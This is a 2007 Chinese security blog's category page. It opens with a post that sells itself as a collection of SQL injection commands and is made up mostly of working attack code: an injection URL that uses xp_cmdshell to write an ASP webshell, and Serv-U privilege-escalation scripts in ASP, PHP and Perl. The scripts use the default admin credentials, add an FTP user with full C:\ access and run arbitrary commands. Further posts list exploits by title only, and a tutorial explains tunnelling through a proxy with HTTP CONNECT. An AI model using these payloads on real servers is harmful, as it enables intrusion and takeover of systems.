C++博客-elva-随笔分类-网络安全

最详细的SQL注入相关的命令整理

叶子 — Mon, 22 Oct 2007 01:41:00 GMT

QUOTE:

1、用^转义字符来写ASP(一句话木马)文件的方法:
? http://192.168.1.5/display.asp?keyno=1881;exec master.dbo.xp_cmdshell 'echo ^
<%
case 2
    set b=Server.CreateObject("Microsoft.XMLHTTP")
    b.open "GET", "http://127.0.0.1:" & ftpport & "/goldsun/upadmin/s2", True, "", ""
    b.send "User go" & vbCrLf & "pass od" & vbCrLf & "site exec " & cmd & vbCrLf & quit
   set session("b")=b
%>

<%
case 3
    set c=Server.CreateObject("Microsoft.XMLHTTP")
    c.open "GET", "http://127.0.0.1:" & port & "/goldsun/upadmin/s3", True, "", ""
    c.send loginuser & loginpass & mt & deldomain & quit
    set session("c")=c
%>
提权完毕,已执行了命令：
<%=cmd%>

<%
case else
on error resume next
    set a=session("a")
    set b=session("b")
    set c=session("c")
    a.abort
    Set a = Nothing
    b.abort
    Set b = Nothing
    c.abort
    Set c = Nothing
%>

<% end select
function Gpath()
on error resume next
    err.clear
    set f=Server.CreateObject("Scripting.FileSystemObject")
    if err.number>0 then
gpath="c:"
        exit function
    end if
gpath=f.GetSpecialFolder(0)
gpath=lcase(left(gpath,2))
set f=nothing
end function
Function GName()
If request.servervariables("SERVER_PORT")="80" Then
GName="http://" & request.servervariables("server_name")&lcase(request.servervariables("script_name"))
Else
GName="http://" & request.servervariables("server_name")&":"&request.servervariables("SERVER_PORT")&lcase(request.servervariables("script_name"))
End If
End Function
%>

ASPX

<%@ Page Language="VB" Debug="true" %>
<%@ import Namespace="System.Net.Sockets" %>

PHP

if(isset($_POST["Port"])&&isset($_POST["User"])&&isset($_POST["Pass"]))
{
  $sendbuf = "";
  $recvbuf = "";
  $domain = "-SETDOMAIN\r\n".
   "-Domain=haxorcitos|0.0.0.0|2121|-1|1|0\r\n".
   "-TZOEnable=0\r\n".
   " TZOKey=\r\n";
  $adduser = "-SETUSERSETUP\r\n".
   "-IP=0.0.0.0\r\n".
   "-PortNo=2121\r\n".
   "-User=Will_Be\r\n".
   "-Password=Will_Be\r\n".
   "-HomeDir=c:\\\r\n".
   "-LoginMesFile=\r\n".
   "-Disable=0\r\n".
   "-RelPaths=1\r\n".
   "-NeedSecure=0\r\n".
   "-HideHidden=0\r\n".
   "-AlwaysAllowLogin=0\r\n".
   "-ChangePassword=0\r\n".
   "-QuotaEnable=0\r\n".
   "-MaxUsersLoginPerIP=-1\r\n".
   "-SpeedLimitUp=0\r\n".
   "-SpeedLimitDown=0\r\n".
   "-MaxNrUsers=-1\r\n".
   "-IdleTimeOut=600\r\n".
   "-SessionTimeOut=-1\r\n".
   "-Expire=0\r\n".
   "-RatioUp=1\r\n".
   "-RatioDown=1\r\n".
   "-RatiosCredit=0\r\n".
   "-QuotaCurrent=0\r\n".
   "-QuotaMaximum=0\r\n".
   "-Maintenance=None\r\n".
   "-PasswordType=Regular\r\n".
   "-Ratios=None\r\n".
   " Access=c:\\|RELP\r\n";
  $deldomain="-DELETEDOMAIN\r\n".
   "-IP=0.0.0.0\r\n".
   " PortNo=2121\r\n";
  $sock = fsockopen("127.0.0.1", $_POST["Port"], &$errno, &$errstr, 10);
  $recvbuf = fgets($sock, 1024);
  echo "Recv: $recvbuf
";
  $sendbuf = "USER ".$_POST["User"]."\r\n";
  fputs($sock, $sendbuf, strlen($sendbuf));
  echo "Send: $sendbuf
";
  $recvbuf = fgets($sock, 1024);
  echo "Recv: $recvbuf
";
  $sendbuf = "PASS ".$_POST["Pass"]."\r\n";
  fputs($sock, $sendbuf, strlen($sendbuf));
  echo "Send: $sendbuf
";
  $recvbuf = fgets($sock, 1024);
  echo "Recv: $recvbuf
";
  $sendbuf = "SITE MAINTENANCE\r\n";
  fputs($sock, $sendbuf, strlen($sendbuf));
  echo "Send: $sendbuf
";
  $recvbuf = fgets($sock, 1024);
  echo "Recv: $recvbuf
";
  $sendbuf = $domain;
  fputs($sock, $sendbuf, strlen($sendbuf));
  echo "Send: $sendbuf
";
  $recvbuf = fgets($sock, 1024);
  echo "Recv: $recvbuf
";
  $sendbuf = $adduser;
  fputs($sock, $sendbuf, strlen($sendbuf));
  echo "Send: $sendbuf
";
  $recvbuf = fgets($sock, 1024);
  echo "Recv: $recvbuf
";
  echo "**********************************************************
";
  echo "Starting Exploit ...
";
  echo "**********************************************************
";
  $exp = fsockopen("127.0.0.1", "2121", &$errno, &$errstr, 10);
  $recvbuf = fgets($exp, 1024);
  echo "Recv: $recvbuf
";
  $sendbuf = "USER Will_Be\r\n";
  fputs($exp, $sendbuf, strlen($sendbuf));
  echo "Send: $sendbuf
";
  $recvbuf = fgets($exp, 1024);
  echo "Recv: $recvbuf
";
  $sendbuf = "PASS Will_Be\r\n";
  fputs($exp, $sendbuf, strlen($sendbuf));
  echo "Send: $sendbuf
";
  $recvbuf = fgets($exp, 1024);
  echo "Recv: $recvbuf
";
  $sendbuf = "site exec ".$_POST["Command"]."\r\n";
  fputs($exp, $sendbuf, strlen($sendbuf));
  echo "Send: site exec ".$_POST["Command"]."
";
  $recvbuf = fgets($exp, 1024);
  echo "Recv: $recvbuf
";
  echo "**********************************************************
";
  echo "Starting Delete Domain ...
";
  echo "**********************************************************
";
  $sendbuf = $deldomain;
  fputs($sock, $sendbuf, strlen($sendbuf));
  echo "Send: $sendbuf
";
  $recvbuf = fgets($sock, 1024);
  echo "Recv: $recvbuf
";
  fclose($sock);
  fclose($exp);
}
?>

Serv-U Local Exploit By Will_Be

Perl
Perl的默认安装路径是：C:\Perl
然后使用：
perl 你的pl文件的路径。
在WEBSHELL中的路径是这样的：
C:\perl\bin\perl 你的pl文件的路径

#!/usr/bin/perl
use IO::Socket;

binmode(STDOUT);
syswrite(STDOUT, "Content-type: text/html\r\n\r\n", 27);

$addr = "127.0.0.1";
$ftpport = 21;
$adminport = 43958;
$adminuser = "LocalAdministrator";
$adminpass = '#l@$ak#.lk;0@P';
$user = "h4x0r";
$password = "123456";
$homedir = 'C:\\';
$dir = 'C:\\WINNT\\System32\\';

use IO::Socket::INET;

$sock = IO::Socket::INET->new("127.0.0.1:$adminport") || die "fail";

print "TEST

";

print $sock "USER $adminuser\r\n";
sleep (1);
print $sock "PASS $adminpass\r\n";
sleep(1);
print $sock "SITE MAINTENANCE\r\n";
sleep(1);
print $sock "-SETUSERSETUP\r\n";
print $sock "-IP=".$addr."\r\n";
print $sock "-PortNo=".$ftpport."\r\n";
print $sock "-User=".$user."\r\n";
print $sock "-Password=".$password."\r\n";
print $sock "-HomeDir=".$homedir."\r\n";
print $sock "-LoginMesFile=\r\n";
print $sock "-Disable=0\r\n";
print $sock "-RelPaths=0\r\n";
print $sock "-NeedSecure=0\r\n";
print $sock "-HideHidden=0\r\n";
print $sock "-AlwaysAllowLogin=0\r\n";
print $sock "-ChangePassword=1\r\n";
print $sock "-QuotaEnable=0\r\n";
print $sock "-MaxUsersLoginPerIP=-1\r\n";
print $sock "-SpeedLimitUp=-1\r\n";
print $sock "-SpeedLimitDown=-1\r\n";
print $sock "-MaxNrUsers=-1\r\n";
print $sock "-IdleTimeOut=600\r\n";
print $sock "-SessionTimeOut=-1\r\n";
print $sock "-Expire=0\r\n";
print $sock "-RatioUp=1\r\n";
print $sock "-RatioDown=1\r\n";
print $sock "-RatiosCredit=0\r\n";
print $sock "-QuotaCurrent=0\r\n";
print $sock "-QuotaMaximum=0\r\n";
print $sock "-Maintenance=System\r\n";
print $sock "-PasswordType=Regular\r\n";
print $sock "-Ratios=None\r\n";
print $sock " Access=".$homedir."|RWAMELCDP\r\n";
print $sock "QUIT\r\n";

@ret=<$sock>;
print "@ret";

close(STDERR);
close(STDOUT);
exit;

叶子 2007-08-04 15:17 发表评论

Symantec 核心驱动 symtdi.sys 本地权限提升漏洞

叶子 — Fri, 20 Jul 2007 04:15:00 GMT

摘要: 阅读全文

叶子 2007-07-20 12:15 发表评论

Rav 核心驱动 memscan.sys 本地权限提升漏洞

叶子 — Fri, 20 Jul 2007 04:14:00 GMT

摘要: 阅读全文

叶子 2007-07-20 12:14 发表评论

Linux Kernel do_mremap VMA本地权限提升漏洞

叶子 — Thu, 31 May 2007 19:10:00 GMT

摘要: 阅读全文

叶子 2007-06-01 03:10 发表评论

Kaspersky Anti-Virus 远程删除任意文件漏洞分析及利用代码

叶子 — Thu, 31 May 2007 12:44:00 GMT

摘要: 阅读全文

叶子 2007-05-31 20:44 发表评论

命令批处理实现对3389登录的日志记录

叶子 — Wed, 23 May 2007 17:50:00 GMT

摘要: 阅读全文

叶子 2007-05-24 01:50 发表评论

判断当前用户是否为系统管理员

叶子 — Sun, 13 May 2007 16:56:00 GMT

摘要: 阅读全文

叶子 2007-05-14 00:56 发表评论

2000下可执行文件修改自身

叶子 — Sun, 13 May 2007 16:55:00 GMT

摘要: 阅读全文

叶子 2007-05-14 00:55 发表评论

第一个支持2000和2003下完美进行用户克隆的C源码(可在webshell里直接运行)

叶子 — Sun, 13 May 2007 16:49:00 GMT

摘要: 阅读全文

叶子 2007-05-14 00:49 发表评论

MS Windows GDI Local Privilege Escalation Exploit (MS07-017)

叶子 — Tue, 08 May 2007 08:49:00 GMT

摘要: 阅读全文

叶子 2007-05-08 16:49 发表评论

带详细解释的冲击波原代码

叶子 — Tue, 08 May 2007 08:43:00 GMT

摘要: 阅读全文

叶子 2007-05-08 16:43 发表评论

HTTP Tunneling

叶子 — Sun, 06 May 2007 08:51:00 GMT

Introduction

HTTP Tunneling

HTTP is a text-based protocol to retrieve Web pages through a Web browser. Mostly, if you are on a LAN connection, you are behind a proxy server; this proxy server has one HTTP proxy running on some defined port. In your Internet Explorer's Connection option, you specify LAN settings as required. This proxy server is definitely running on a text-based protocol, and you can only get HTTP-related data from the outside network, right!! Well, there is a small loophole from which you can go through HTTP and connect to the outside world and get any data you want in binary protocol, or even your own protocol. It's through HTTPS.

HTTPS Explanation

In HTTPS, data is transferred from browser to server and server to browser in a secure manner. It's a binary protocol; when it goes through a proxy, the proxy doesn't understand anything. The proxy just allows a binary stream to open and lets both server and client exchange the data. Now, we can fool the proxy server and connect to any server and exchange data. The proxy server will think that we are doing some secure HTTP session.

For HTTPS, your browser connects to a proxy server and sends a command:

CONNECT neurospeech.com:443 HTTP/1.0 
HOST neurospeech.com:443
[... other HTTP header lines ending with  if required]>
    // Last Empty Line

Then, the proxy server treats this as some HTTP Secure Session, and opens a binary stream to the required server and port as defined. If a connection is established, the proxy server returns the following response:

HTTP/1.0 200 Connection Established
[.... other HTTP header lines ending with ..
ignore all of them]
    // Last Empty Line

Now, the browser is connected to the end server and can exchange data in both a binary and secure form.

How to Do This

Now, it's your program's turn to fool the proxy server and behave as Internet Explorer behaves for Secure HTTP.

Connect to Proxy Server first.
Issue CONNECT Host:Port HTTP/1.1.
Issue .
Wait for a line of response. If it contains HTTP/1.X 200, the connection is successful.
Read further lines of response until you receive an empty line.
Now, you are connected to the outside world through a proxy. Do any data exchange you want.

Sample Source Code

Collapse

  // You need to connect to mail.yahoo.com on port 25
// Through a proxy on 192.0.1.1, on HTTP Proxy 4480
// CSocketClient is Socket wrapping class
// When you apply operator << on CString, it writes CString
// To Socket ending with CRLF
// When you apply operator >> on CString, it receives
// a Line of response from socket until CRLF
try
{
CString Request,Response;
CSocketClient Client;
Client.ConnectTo("192.0.1.1",4480);
// Issue CONNECT Command
Request = "CONNECT mail.yahoo.com:25 HTTP/1.0";
Client<>Response;
// Ignore HTTP Version
int n = Response.Find(' ');
Response = Response.Mid(n+1);
// Http Response Must be 200 only
if(Response.Left(3)!="200")
{
// Connection refused from HTTP Proxy Server
AfxMessageBox(Response);
}
// Read Response Lines until you receive an empty line.
do
{
Client>>Response;
if (Response.IsEmpty())
break;
}while (true);
// Coooooooool.... Now connected to mail.yahoo.com:25
// Do further SMTP Protocol here..
}
catch (CSocketException * pE)
{
pE->ReportError();
}

Library Source Code

The Dns.h file contains all DNS-related source code. It uses other libraries, as SocketEx.h, SocketClient.h, and NeuroBuffer.h.

CSocketEx

Socket functions as a wrapper class. (CSocket is very heavy and unreliable if you don't have the exact idea of how it works.) All the functions are of the same name as CSocket. You can use this class directly.

CSocketClient

Derived from CSocketEx and throws proper exceptions with details of Winsock errors. It defines two operators, >> and <<, for easy sending and receiving; it also changes network to host and host to network order of bytes if required.

CHttpProxySocketClient

Derived from CSocketClient, you can call the SetProxySettings(ProxyServer,Port) method and set proxy settings. Then, you can connect to the desired host and port as you need. The ConnectTo method is overridden, and it automatically implements an HTTP proxy protocol and gives you a connection without any hassle.

How to Use CHttpProxySocketClient

Collapse

  // e.g. You need to connect to mail.yahoo.com on port 25
// Through a proxy on 192.0.1.1, on HTTP Proxy 4480
// CSocketClient is Socket wrapping class
// When you apply operator << on CString, it writes CString
// To Socket ending with CRLF
// When you apply operator >> on CString, it receives
// Line of response from socket until CRLF
try
{
CHttpProxySocketClient Client;
Client.SetProxySettings("192.0.1.1",1979);
// Connect to server mail.yahoo.com on port 25
Client.ConnectTo("mail.yahoo.com",25);
// You now have access to mail.yahoo.com on port 25
// If you do not call SetProxySettings, then
// you are connected to mail.yahoo.com directly if
// you have direct access, so always use
// CHttpProxySocketClient and no need to do any
// extra coding.
}
catch(CSocketException * pE) {
pE->ReportError();
}

Note: I usually don't program in the form of .h and .cpp different files, because using them the next time somewhere else is a big problem because you must move both files here and there. So, I put all the code in my .h file only; I don't write to the .cpp file unless it's required. You need to copy only the SocketEx.h, SocketClient.h, and HttpProxySocket.h files into your project's directory, and add line:
#include "HttpProxySocket.h"
after your:
#if !defined(.....
and so forth code of your Visual Studio-generated file. If you put anything above this, you will get n number of errors.

叶子 2007-05-06 16:51 发表评论

远程桌面安全全解（下）

叶子 — Sun, 06 May 2007 08:36:00 GMT

摘要: 阅读全文

叶子 2007-05-06 16:36 发表评论

远程桌面安全全解(上)

叶子 — Sun, 06 May 2007 08:35:00 GMT

摘要: 阅读全文

叶子 2007-05-06 16:35 发表评论

Serv-U 提升权限 ASP版 Goldsun[at]84823714
用户名:
口　令：	>
端　口：
系统路径：
命　令：